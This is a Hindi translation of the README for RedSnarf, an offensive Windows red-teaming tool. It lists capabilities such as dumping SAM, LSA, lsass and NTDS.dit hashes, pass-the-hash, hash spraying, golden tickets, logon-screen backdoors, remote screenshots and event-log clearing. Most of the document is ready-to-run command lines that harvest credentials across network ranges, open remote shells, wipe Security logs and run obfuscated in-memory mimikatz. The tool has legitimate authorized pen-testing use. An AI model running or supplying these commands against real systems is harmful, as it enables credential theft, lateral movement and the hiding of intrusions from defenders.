
RedSnarf एक pen-testing / red-teaming टूल है जो Windows वातावरण के लिए है।
______ .____________ _____
______ \ ____ | / / ____ _____ ____/ \
| // __ \ / __ |_ \ / \ \ __ \ __\
| | \ __// // |/ \ | / __ | | /| |
|| /_ >_ /_______ /_| (__ /| ||
/ / / / / /
[email protected]
@redsnarf
RedSnarf एक पेन-टेस्टिंग / रेड-टीमिंग टूल है, जिसे एड विलियम्स द्वारा बनाया गया है। यह OpSec सुरक्षित तकनीकों का उपयोग करके विंडोज वर्कस्टेशन, सर्वर और डोमेन कंट्रोलर से हैश और क्रेडेंशियल प्राप्त करने के लिए है।
वीडियो के लिए हमारा YouTube चैनल देखें https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ
RedSnarf की कार्यक्षमता में शामिल हैं:
• स्थानीय SAM हैश प्राप्त करना
• उन्नत सिस्टम विशेषाधिकारों के साथ चल रहे उपयोगकर्ताओं और उनके संबंधित lsa secrets पासवर्ड की गणना करना;
• MS कैश्ड क्रेडेंशियल प्राप्त करना;
• Pass-the-hash;
• कमजोर और अनुमान लगाने योग्य उपयोगकर्ता नाम/पासवर्ड संयोजनों की त्वरित पहचान (डिफ़ॉल्ट administrator/Password01);
• एक सीमा पर हैश प्राप्त करने की क्षमता;
• Hash spraying -
Credsfile pwdump, fgdump और स्पेस से अलग किए गए सादे टेक्स्ट उपयोगकर्ता नाम और पासवर्ड के मिश्रण को स्वीकार करेगा;
• Mimikatz के साथ ऑफलाइन विश्लेषण के लिए Lsass डंप;
• NTDSUtil का उपयोग करके डोमेन कंट्रोलर हैश डंप करना और स्थानीय पार्सिंग के लिए NTDS.dit प्राप्त करना;
• drsuapi विधि का उपयोग करके डोमेन कंट्रोलर हैश डंप करना;
• डोमेन कंट्रोलर से Scripts और Policies फोल्डर प्राप्त करना और 'password' और 'administrator' के लिए पार्स करना;
• cpassword हैश को डिक्रिप्ट करने की क्षमता;
• रिमोट मशीन पर शेल शुरू करने की क्षमता;
• इवेंट लॉग (application, security, setup या system) को साफ करने की क्षमता; (केवल आंतरिक संस्करण)
• विश्लेषण के लिए परिणाम प्रति-होस्ट आधार पर सहेजे जाते हैं।
• रिमोट मशीन पर RDP सक्षम/अक्षम करें।
• रिमोट मशीन पर RDP पोर्ट 3389 से 443 में बदलें।
• रिमोट मशीन पर NLA सक्षम/अक्षम करें।
• पता लगाएं कि उपयोगकर्ता रिमोट मशीनों पर कहाँ लॉग इन हैं।
• Windows लॉगऑन स्क्रीन में बैकडोर डालें
• रिमोट मशीन पर UAC सक्षम/अक्षम करें।
• स्टील्थ mimikatz जोड़ा गया।
• डोमेन हैश का पार्सिंग
• यह निर्धारित करने की क्षमता कि कौन से खाते सक्षम/अक्षम हैं
• रिमोट लॉग ऑन एक्टिव यूजर के डेस्कटॉप का स्क्रीनशॉट लें
• रिमोट लॉग ऑन एक्टिव यूजर के डेस्कटॉप को रिकॉर्ड करें
• Windows CPassword डिक्रिप्ट करें
• WinSCP पासवर्ड डिक्रिप्ट करें
• उपयोगकर्ता SPN प्राप्त करें
• रिमोट मशीनों से WIFI पासवर्ड प्राप्त करें
आवश्यकताएँ:
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Lsass प्राप्त करने के लिए procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - स्थानीय रूप से Mimikatz जानकारी पार्स करने में उपयोग किया जाता है
सहायता दिखाएँ
./redsnarf.py -h
./redsnarf.py --help
एकल मशीन से कमजोर स्थानीय क्रेडेंशियल का उपयोग करके और Security इवेंट लॉग को साफ करते हुए स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -uC security
एकल मशीन से कमजोर स्थानीय क्रेडेंशियल का उपयोग करके और application इवेंट लॉग को साफ करते हुए स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -uC application
एकल मशीन से स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .
एकल मशीन से डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com
नेटवर्क रेंज पर स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके हैश प्राप्त करें
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .
नेटवर्क रेंज पर डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके हैश प्राप्त करें
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com
नेटवर्क रेंज पर डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके हैश प्राप्त करें
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com
नेटवर्क रेंज पर हैश स्प्रे करें
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .
नेटवर्क रेंज पर डोमेन लॉगिन के साथ हैश प्राप्त करें
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com
क्रेडेंशियल की त्वरित जाँच करें
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y
उपयोगकर्ता नामों वाली फाइल (-hS) और एक सामान्य पासवर्ड (-hP) की त्वरित जाँच करें
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y
drsuapi विधि का उपयोग करके हैश प्राप्त करें (सबसे तेज़)
यह विधि एक वैकल्पिक फ्लैग -q y का समर्थन करती है जो LDAP को क्वेरी करेगा और आउटपुट देगा कि खाते सक्रिय हैं या अक्षम
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)
NTDSUtil का उपयोग करके हैश प्राप्त करें
यह विधि एक वैकल्पिक फ्लैग -q y का समर्थन करती है जो LDAP को क्वेरी करेगा और आउटपुट देगा कि खाते सक्रिय हैं या अक्षम
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)
गोल्डन टिकट उत्पन्न करना
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y
डोमेन कंट्रोलर से Policies और Scripts फोल्डर कॉपी करें और password और administrator के लिए पार्स करें
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y
Cpassword डिक्रिप्ट करें
./redsnarf.py -uG cpassword
उपयोगकर्ता ढूँढें - लाइव
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name
उपयोगकर्ता ढूँढें - ऑफलाइन (पहले से डाउनलोड की गई जानकारी खोजता है)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name
NT AUTHORITY\SYSTEM टास्कलिस्ट प्रदर्शित करें
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y
रिमोट लॉग ऑन एक्टिव यूजर के डेस्कटॉप का स्क्रीनशॉट लें
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y
स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर शेल शुरू करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर शेल शुरू करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y
Mimikatz के साथ ऑफलाइन पार्सिंग के लिए lsass की एक कॉपी प्राप्त करें - स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y
स्टील्थ mimikatz चलाएं, यह विकल्प एक वेब-सर्वर शुरू करता है जो एक powershell स्क्रिप्ट प्रदान करता है, यह मशीन साइड पर अस्पष्ट और एन्कोडेड होता है, डेटा डिस्क को नहीं छूता - क्रेडेंशियल को आसानी से पढ़ने योग्य शैली में grep किया जाता है और स्क्रीन पर इको किया जाता है।
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y
कस्टम कमांड चलाएं
उदाहरण 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'
उदाहरण 2 - डबल कोट्स को \ से एस्केप करना होगा
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'
स्थानीय एक्सेस टोकन नीति